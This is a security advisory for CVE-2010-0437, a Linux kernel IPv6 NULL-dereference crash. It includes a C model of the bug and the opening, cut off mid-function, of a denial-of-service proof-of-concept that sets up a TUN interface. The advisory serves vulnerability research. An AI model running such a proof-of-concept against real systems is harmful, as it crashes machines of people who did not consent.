Author: 铥铥宇900 | Source: Internet | 2017-11-13 02:33
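Affected versions:
Linux kernel 2.6.x
Vulnerability description:
CVE(CAN) ID: CVE-2010-0437
Linux Kernel is the kernel used by the open-source operating system Linux.
The ip6_dst_lookup_tail() function in the Linux Kernel contains a NULL pointer dereference vulnerability. An attacker on the local network can trigger the vulnerability by sending IPv6 traffic to the target system; if dst->neighbour is NULL on the target system when an IPv6 packet is received, the system crashes.
<*References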
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=563781
https://bugzilla.kernel.org/show_bug.cgi?format=multiple&id=11469
https://www.redhat.com/support/errata/RHSA-2010-0149.html
https://www.redhat.com/support/errata/RHSA-2010-0148.html
https://www.redhat.com/support/errata/RHSA-2010-0147.html
*>
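The NULL dereference described above, reduced to a user-space C model (an added example, not kernel source and not code from the original page). The structure layout, the `state` field, `MODEL_VALID`, the result enum and both function names are assumptions made for illustration; only `dst->neighbour` comes from the advisory.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical stand-ins for the kernel structures named in the advisory. */
struct neighbour { unsigned state; };            /* 'state' is a model field */
struct dst_entry { struct neighbour *neighbour; };

#define MODEL_VALID 0x1u                         /* constructed flag value */

enum lookup_result { LOOKUP_OK, LOOKUP_NEEDS_RESOLUTION };

/* Vulnerable shape: reads a field through dst->neighbour without checking
 * the pointer. With neighbour == NULL this is the NULL pointer dereference
 * (a crash in kernel context). Only call it with a non-NULL neighbour. */
enum lookup_result lookup_tail_unchecked(const struct dst_entry *dst)
{
    if (!(dst->neighbour->state & MODEL_VALID))
        return LOOKUP_NEEDS_RESOLUTION;
    return LOOKUP_OK;
}

/* Hardened shape: test the pointer before the field. In this model a
 * missing neighbour simply skips the validity check (assumed policy). */
enum lookup_result lookup_tail_checked(const struct dst_entry *dst)
{
    if (dst->neighbour != NULL && !(dst->neighbour->state & MODEL_VALID))
        return LOOKUP_NEEDS_RESOLUTION;
    return LOOKUP_OK;
}

int main(void)
{
    /* Constructed sample inputs: valid, unresolved and absent neighbour. */
    struct neighbour valid = { MODEL_VALID }, unresolved = { 0 };
    struct dst_entry cases[] = { { &valid }, { &unresolved }, { NULL } };
    const char *names[] = { "valid neighbour", "unresolved neighbour",
                            "neighbour == NULL" };

    for (size_t i = 0; i < 3; i++)
        printf("%-22s -> %s\n", names[i],
               lookup_tail_checked(&cases[i]) == LOOKUP_OK
                   ? "ok" : "needs resolution");
    return 0;
}
```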
Test method:
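The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */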
/*****************************************************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice is *
* retained and/or reproduced in the documentation provided with the *
* distribution. *
* *
* To the extent permitted by law, this software is provided with no *
* express or implied warranties of any kind. *
* The situation as regards scientific and technical know-how at the time *
* when this software was distributed did not enable all possible uses to be *
* tested and verified, nor for the presence of any or all faults to be *
* detected. In this respect, people’s attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software’s suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* The author does not warrant that this software does not infringe any or *
* all intellectual right relating to a patent, a design or a trademark. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistribution of this software. *
*****************************************************************************/
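#define _GNU_SOURCE 1
/* Headers required by the code below. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_tun.h>
#include <pthread.h>

/* Format a shell command and execute it with system(). */
static void run (const char *fmt, ...)
{
    va_list ap;
    char *cmd;
    int len;

    va_start (ap, fmt);
    len = vasprintf (&cmd, fmt, ap);
    va_end (ap);
    if (len == -1)
        return; /* allocation failed, cmd is undefined */
    system (cmd);
    free (cmd);
}

/* Create a TUN interface, bring it up and assign it an IPv6 address.
 * Returns the TUN file descriptor, or -1 on error. */
static int tun_open (void)
{
    struct ifreq req;

    int fd = open ("/dev/net/tun", O_RDWR);
    if (fd == -1)
        return -1;

    memset (&req, 0, sizeof (req));
    req.ifr_flags = IFF_TUN;
    if (ioctl (fd, TUNSETIFF, &req))
    {
        (void) close (fd);
        return -1;
    }

    /* The kernel fills in req.ifr_name with the interface it created. */
    run ("ip link set dev %s up", req.ifr_name);
    run ("ip -6 address add fd34:5678:9abc:def0::1/64 dev %s",
         req.ifr_name);
    return fd;
}

static unsigned rcvd;
static int tun;

/* Cleanup handler: close the descriptor passed as an opaque pointer. */
static void cleanup_fd (void *data)
{
    (void) close ((intptr_t)data);
}

/* Worker thread entry point; data carries the thread's index. */
static void *thread (void *data)
{
    unsigned n = (uintptr_t)data;
    struct sockaddr_in6 dst;
    uint16_t tunhead[2];
    int fd = socket (PF_INET6, SOCK_DGRAM, 0);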